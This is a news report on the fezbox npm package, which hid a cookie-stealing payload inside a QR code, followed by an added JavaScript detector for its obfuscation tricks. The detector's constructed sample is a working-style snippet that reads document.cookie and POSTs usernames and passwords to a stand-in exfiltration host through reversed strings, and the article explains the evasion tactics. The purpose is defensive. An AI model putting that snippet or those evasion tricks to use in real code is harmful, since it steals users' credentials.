QR codes become the vehicle for malware in new technique
Wednesday September 24, 2025. 03:51 AM , from InfoWorld
QR codes are ubiquitous these days, as they are an easy way to deliver marketing content or direct users to websites and apps.
They have also become a hiding place for malicious code. A threat research team at cybersecurity company Socket has discovered what it called “a sophisticated backdoor mechanism” that, when incorporated into an enterprise’s app or website, steals usernames and passwords stored in visitors’ cookies, using code hidden inside a QR code image. The malicious package, fezbox, is disguised as a utility library and has “layers of obfuscation,” including the “innovative, steganographic use” of QR codes. Steganography is the practice of embedding secret data in a cover medium (here, an image) so that it goes unnoticed. “Steganography is the practice of hiding a secret file in plain sight, something for which QR codes are great,” wrote Socket researcher Olivia Brown. “The use of a QR code for further obfuscation is a creative twist by the threat actor.”

Hiding within seemingly meaningless code

The package was published to npm, the popular package registry for JavaScript, and features three layers of obfuscation: a reversed string, a QR code, and a hidden payload. The delivery mechanism harvests usernames and passwords from browser cookies using code concealed in a QR code that is unusually dense with data and, as a result, hard for a human reviewer to read.

Fezbox claims to be a JavaScript/TypeScript utility library of “common helper functions,” organized into feature modules so users can pick and choose. Its README file, written in Chinese, includes the phrases “TypeScript types,” “high performance,” and “tests,” and describes a QR code module that can generate and parse codes and automatically load the components it needs. It does not mention that simply importing the library starts a background routine that fetches a QR code image from a remote server, decodes it, and runs the code hidden inside. That loader code is minified and buried in larger blocks of seemingly benign “no-operation (no-op)” code, padding intended to get it past security checks and casual review.
A specific condition within the code checks whether the app is running in a development environment; if it is, “the code does nothing,” Brown explained, noting that this is a typical stealth tactic. “The threat actor does not want to risk being caught in a virtual environment or any non-production environment, so they may often add guardrails around when and how their exploit runs,” she wrote. Otherwise, after a 120-second delay, the package downloads the QR image and executes the code recovered from it. That code reads the browser’s cookies via “document.cookie” and looks for a username and a password. The strings it depends on are written backwards in the source and reversed at run time, so “password” appears as “drowssap.” Reversing is a “classic anti-analysis stealth trick,” Brown noted, as it can bypass analysis tools that look for URLs, but not necessarily their backwards versions. If the cookie contains both a username and a password, the package exfiltrates them in an HTTPS POST request; otherwise it “does nothing and exits quietly,” Brown explained. While the main utility functions appeared legitimate, the obfuscated pattern “represents a critical security threat enabling remote code execution with stealth characteristics,” Brown wrote. However, she noted that most apps no longer store passwords in cookies, so it is difficult to determine how successful the malware might be.

A ‘noteworthy escalation’

The package has since been removed from the npm registry, which GitHub operates, and listed as malicious. But it is indicative of wider use of QR codes and audio and video files by threat actors who are getting ever more stealthy in their techniques. By hiding executable code inside a QR code, attackers take advantage of developer confidence in QR parsing tools: to a reviewer, the package appears to download and decode an image, not to fetch code, so the image download has to be treated as the code fetch it really is. “We made QR codes ubiquitous during the pandemic and we can’t put that genie back in the bottle,” said David Shipley of Beauceron Security.
“Attackers are getting clever with these latest attacks and there’s no sign they’re going away anytime soon.” This is a “noteworthy escalation,” he said, urging devs to be aware that threat actors are looking to go after their valuable secrets, too. While it’s long been easy to phish everyday people, when criminals can phish developers, “they’ll never go hungry for credentials again.” “For security and developer teams, the key here is a security culture that teaches coders to be careful and makes sure humans are in the review process at all times,” Shipley advised.
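The three tells the article describes (strings stored backwards, a long start-up delay, and an environment guard) can be checked for statically before a package is trusted. The following is an added example written for this page; it is not code from fezbox, from Socket, or from the article. The indicator list, the regexes, and the SAMPLE snippet are all constructed for illustration, and the hostname exfil.example.com is made up.

```javascript
// Added example (not code from fezbox or Socket): a small static triage for
// the obfuscation layers described above, run over a constructed snippet.

// Strings a reviewer would normally grep for. Storing them backwards in the
// source and reversing at run time is the "reversed string" layer.
const INDICATORS = ['document.cookie', 'https://', 'password', 'username'];

function reverse(s) {
  return s.split('').reverse().join('');
}

// Extract single- and double-quoted string literals. A regex is enough for a
// demo on minified code; a real tool would walk an AST instead.
function stringLiterals(src) {
  const re = /'((?:\\.|[^'\\])*)'|"((?:\\.|[^"\\])*)"/g;
  const out = [];
  let m;
  while ((m = re.exec(src)) !== null) out.push(m[1] !== undefined ? m[1] : m[2]);
  return out;
}

// Flag literals that contain no indicator but whose reversed form does.
function findReversedIndicators(src) {
  const hits = [];
  for (const lit of stringLiterals(src)) {
    const rev = reverse(lit);
    for (const ind of INDICATORS) {
      if (rev.includes(ind) && !lit.includes(ind)) {
        hits.push({ literal: lit, decodesTo: rev, indicator: ind });
      }
    }
  }
  return hits;
}

// setTimeout delays of a minute or more: the "wait out the sandbox" layer.
// The lazy match stops at the first ", <digits>)" after setTimeout, which is
// fine for the demo but can be fooled by nested calls with numeric arguments.
function findLongDelays(src, minMs = 60000) {
  const re = /setTimeout\s*\(([\s\S]*?),\s*(\d+)\s*\)/g;
  const delays = [];
  let m;
  while ((m = re.exec(src)) !== null) {
    const ms = Number(m[2]);
    if (ms >= minMs) delays.push(ms);
  }
  return delays;
}

// Branching on NODE_ENV is normal in libraries; it only matters combined
// with the two signals above, so it is reported but never flagged alone.
function hasEnvGuard(src) {
  return /process\.env\.NODE_ENV\s*(?:!==?|===?)\s*['"](?:development|production|test)['"]/.test(src);
}

function assess(src) {
  const reversedIndicators = findReversedIndicators(src);
  const longDelays = findLongDelays(src);
  const envGuard = hasEnvGuard(src);
  const suspicious = reversedIndicators.length > 0 && (longDelays.length > 0 || envGuard);
  return { reversedIndicators, longDelays, envGuard, suspicious };
}

// Constructed sample imitating the described behaviour: environment guard,
// 120 s delay, reversed document.cookie, reversed cookie keys and a reversed
// exfiltration URL (exfil.example.com is a made-up host).
const SAMPLE = [
  "const r=s=>s.split('').reverse().join('');",
  "if(process.env.NODE_ENV!=='development'){",
  "setTimeout(()=>{",
  "const ck=new Function('return '+r('eikooc.tnemucod'))();",
  "const kv=ck.split(';').map(x=>x.trim().split('='));",
  "const u=kv.find(p=>p[0]===r('emanresu'));",
  "const p=kv.find(q=>q[0]===r('drowssap'));",
  "if(u&&p)fetch(r('tcelloc/moc.elpmaxe.lifxe//:sptth'),{method:'POST',body:JSON.stringify({u:u[1],p:p[1]})});",
  "},120000);}",
].join('\n');

// A benign snippet with a short timer and an ordinary literal, for contrast.
const CLEAN = "const greeting='hello'; setTimeout(tick, 10);";

console.log(JSON.stringify(assess(SAMPLE), null, 2));
console.log(JSON.stringify(assess(CLEAN), null, 2));
```

On the constructed SAMPLE the check recovers document.cookie, username, password and the https:// URL from their reversed literals, records the 120000 ms delay and the NODE_ENV guard, and marks the snippet suspicious; the CLEAN snippet produces no findings. None of this catches the QR layer itself, which is the point of that layer: the only robust defence against fetched-and-decoded payloads is to treat any remote image the package decodes at run time as remote code.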
https://www.infoworld.com/article/4061997/qr-codes-become-the-vehicle-for-malware-in-new-technique.h